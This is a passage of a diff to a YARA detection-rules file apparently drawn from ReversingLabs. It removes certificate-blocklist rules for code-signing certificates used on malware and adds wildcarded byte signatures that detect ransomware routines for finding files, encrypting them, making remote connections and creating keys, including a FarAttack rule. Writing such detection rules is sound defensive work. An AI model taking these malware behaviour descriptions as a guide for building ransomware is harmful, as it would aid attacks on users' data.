6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? + ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ?? + ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D + 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + } + $find_files_p5 = { + 83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ?? + ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ?? + C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? + E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ?? + 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 + 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? + ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? + ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 + } + $find_files_p6 = { + C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 + ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? + ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? + 89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? + 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 + ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ?? + 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75 + ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ?? + 8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F + 84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 + } + $find_files_p7 = { + 8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33 + C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? + 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75 + ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? + 6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF + 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8 + ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 + ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B + 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ?? + ?? ?? ?? FF 75 ?? FF 15 + } + $encrypt_files_p1 = { + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? + ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F + 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ?? + ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ?? + ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 + FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A + } + $encrypt_files_p2 = { + 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? + 8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 + ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? + ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? + ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? + ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F + 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 + 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B + 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 + ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 + } + $encrypt_files_p3 = { + E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? + ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B + 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? + 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B + 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 + ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ?? + 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 + } + $encrypt_files_p4 = { + 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F + 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ?? + ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ?? + ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 + ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53 + FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 + ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 + 0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 + ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? + ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? + ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ?? + ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? + ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A + ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F + 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? + ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ?? + ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D + 49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? + ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF + 15 + } + $remote_connection = { + FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ?? + 8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 + F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB + ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? + ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D + ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D + 4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F + 43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F + 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ?? + ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ?? + 85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? + ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? + ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D + ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 + ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D + ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52 + 0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D + ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sony Pictures Entertainment Inc." and pe.signatures[i].serial=="01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and $remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects FarAttack ransomware." author = "ReversingLabs" - id = "14ad79c7-f669-59a6-94d1-978a13fbb337" - date = "2023-11-08" - modified = "2023-11-08" + id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f" + date = "2022-06-21" + modified = "2022-06-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1126-L1142" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "FarAttack" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MOCOMSYS INC" and pe.signatures[i].serial=="03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "47a10658-c5c4-58b6-b154-7babcfbc50a2" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1144-L1160" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? + ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89 + 45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ?? + 51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ?? + 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ?? + 8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ?? + E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73 + ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43 + ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D + 04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00 + 8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ?? + 66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ?? + FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ?? + ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15 + } + $create_key = { + 55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53 + 33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ?? + 3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 